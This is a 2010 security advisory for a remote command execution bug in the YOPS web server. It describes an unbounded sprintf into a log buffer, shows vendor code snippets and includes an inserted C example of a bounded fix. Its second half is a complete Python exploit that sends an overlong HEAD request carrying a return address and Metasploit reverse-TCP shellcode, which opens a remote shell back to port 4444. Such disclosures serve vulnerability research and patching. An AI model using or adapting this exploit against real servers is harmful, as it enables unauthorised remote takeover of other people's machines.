
# Title : YOPS Web Server Remote Command Execution
# Published : 2010-09-11
# Author : Rodrigo Escobar


[DCA-00015]

[Software]

 - YOPS (Your Open Personal [WEB] Server)

[Vendor Product Description]

 - YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP
server for Linux OS written in C. There are 7 stages (accept, parse,
launch, fetch, error, send and log), and pipes are used as interstage
channels.

[Bug Description]

 - In http_parse_request_header the application performs no bounds check
on a malformed request line received as an HTTP command (HEAD/GET/POST)
before that line is used, in swebs_record_log, as input to the log record
that sprintf writes into the fixed-size logrec buffer.

 --- http.c snippet ---
int http_parse_request_header(char *data, struct http_request_header *h)
{
       int r;
       int ver, rev;
       char *s, *tok, *l, *prm;
[...]
       r = sscanf(h->http, " HTTP/%d.%d ", &ver, &rev);
       if (r != 2)
               return -400;
[...]
}
 --- END snippet ---

 --- swebs.c snippet ---
int swebs_record_log(int log, JOB *job)
{
       int err;
       time_t now;
       char timestr[32];
       char logrec[MAX_REQUEST_LINE_LEN + 1];
[...]
       sprintf (
               logrec,
               "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
               job->client,
               timestr,
               job->hdr.request_line,
               job->response_hlen,
               job->response_blen_sent,
               job->response_blen,
               job->status
               );
[...]
}
 --- END snippet ---
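Added illustration (not vendor code) of the check that the sprintf call above lacks, beside a bounded replacement for it. MAX_REQUEST_LINE_LEN is given an assumed value here, and the struct and function names are hypothetical:

```c
#include <stdio.h>
#include <string.h>

/* Stand-in for the vendor's constant (value assumed here); logrec in
 * swebs_record_log is MAX_REQUEST_LINE_LEN + 1 bytes. */
#define MAX_REQUEST_LINE_LEN 64

/* The fields swebs_record_log writes, mirrored from the advisory's snippet. */
struct log_fields {
    const char *client;
    const char *timestr;
    const char *request_line;   /* attacker-controlled: job->hdr.request_line */
    int response_hlen, response_blen_sent, response_blen, status;
};

/* Same format string as the vendor's sprintf, but bounded: returns the length
 * the record needs (excluding the NUL), writes at most dst_sz bytes and always
 * NUL-terminates when dst_sz > 0. dst may be NULL with dst_sz 0 to size only. */
int format_log_record(char *dst, size_t dst_sz, const struct log_fields *f)
{
    return snprintf(dst, dst_sz, "%s\t[%s]\t\"%s\"\t(%d+%d/%d)\t%d",
                    f->client, f->timestr, f->request_line, f->response_hlen,
                    f->response_blen_sent, f->response_blen, f->status);
}

/* The check the original code lacks. The record also carries the client
 * address, timestamp and counters, so comparing the request line alone
 * against MAX_REQUEST_LINE_LEN would still leave room for an overflow. */
int log_record_fits(const struct log_fields *f)
{
    return format_log_record(NULL, 0, f) <= MAX_REQUEST_LINE_LEN;
}

/* Hardened replacement for the sprintf call: 0 on success, -1 if truncated;
 * logrec is a valid NUL-terminated string either way and is never overrun. */
int record_log_safe(char *logrec, const struct log_fields *f)
{
    int need = format_log_record(logrec, MAX_REQUEST_LINE_LEN + 1, f);
    return (need >= 0 && need <= MAX_REQUEST_LINE_LEN) ? 0 : -1;
}

int main(void)
{
    char line[256], logrec[MAX_REQUEST_LINE_LEN + 1];   /* constructed overlong request line */
    memset(line, 'A', sizeof line - 1);
    line[sizeof line - 1] = '\0';
    struct log_fields f = { "127.0.0.1", "11/Sep/2010", line, 100, 0, 0, 400 };
    printf("needs %d bytes, logrec holds %d: fits=%d safe=%d\n", format_log_record(NULL, 0, &f),
           MAX_REQUEST_LINE_LEN, log_record_fits(&f), record_log_safe(logrec, &f));
    return 0;
}
```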

[History]

 - Advisory sent to vendor on 08/26/2010

[Impact]

 - High (Remote Command Execution)

[Affected Version]

 - YOPS 2009-11-30

 - Prior versions may also be vulnerable

[Code]

#!/usr/bin/python
# Software:
# YOPS (Your Own Personal [WEB] Server) is a small SEDA-like HTTP server for Linux OS written in C.
# URL: http://sourceforge.net/projects/yops2009/
#
# Vulnerability: Rodrigo Escobar aka ipax @ DcLabs
# Exploit: Flavio do Carmo Junior aka waKKu @ DcLabs
# Contact: waKKu <AT> dclabs <DOT> com <DOT> br

import socket
import sys
import time

HOST = "localhost"
PORT = 8888

# Length of the filler placed before the return address; may be given as argv[1].
try:
    BUFF_LEN = int(sys.argv[1])
except (IndexError, ValueError):
    BUFF_LEN = 802
FIXUP_ADDR = "\x47\xce\x04\x08"

shellcode = (
    # MetaSploit Reverse TCP Shell. Host: 127.0.0.1 - Port: 4444
    "\x33\xc9\xb1\x13\xbe\xae\x88\x55\xcb\xda\xcd\xd9\x74\x24\xf4"
    "\x5f\x31\x77\x0e\x03\x77\x0e\x83\x69\x8c\xb7\x3e\x44\x56\xc0"
    "\x22\xf5\x2b\x7c\xcf\xfb\x22\x63\xbf\x9d\xf9\xe4\x9b\x3f\x6a"
    "\x9a\x1b\xbf\x6b\x02\x74\xae\x37\xac\xd7\xba\xd7\x61\x88\xb3"
    "\x39\xc2\x42\xa5\xe1\x08\x12\x70\x95\x4a\xa3\xbd\x54\xec\x8d"
    "\xb8\x9f\xbd\x65\x15\x4f\x4d\x1e\x01\xa0\xd3\xb7\xbf\x37\xf0"
    "\x18\x6c\xc1\x16\x28\x99\x1c\x58\x43"
)

# Malformed request line: filler plus return address, as described in [Bug Description].
buffer = "HEAD "
buffer += "A" * BUFF_LEN
buffer += FIXUP_ADDR * 4
buffer += " HTTP/1.1"

stackadjust = (
    "\xcb"                  # instruction alignment
    "\xbc\x69\x69\x96\xb0"  # Stack Adjustment
)

payload = buffer + stackadjust + shellcode + "\r\n\r\n"

print """
######################################
### DcLabs Security Research Group ###
### +Exploit+ ###
######################################
Software: YOPS 2009 - Web Server
---
Vulnerability by: ipax
Exploit by: waKKu
Greetings to: All DcLabs members
"""

print " [+] Using BUFF_LEN -> ", str(BUFF_LEN)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print " [+] Trying to establish connection..."
s.connect((HOST, PORT))
print " [+] Sending a dummy request to initialize data..."
s.send("HEAD DcLabs HTTP/1.1\r\n\r\n")
try:
    s.recv(1024)
except socket.error:
    pass
s.close()

time.sleep(3)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print " [+] Sending our malicious payload..."
s.send(payload)
print " [+] Payload sent, good luck!"
s.close()

-- 
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br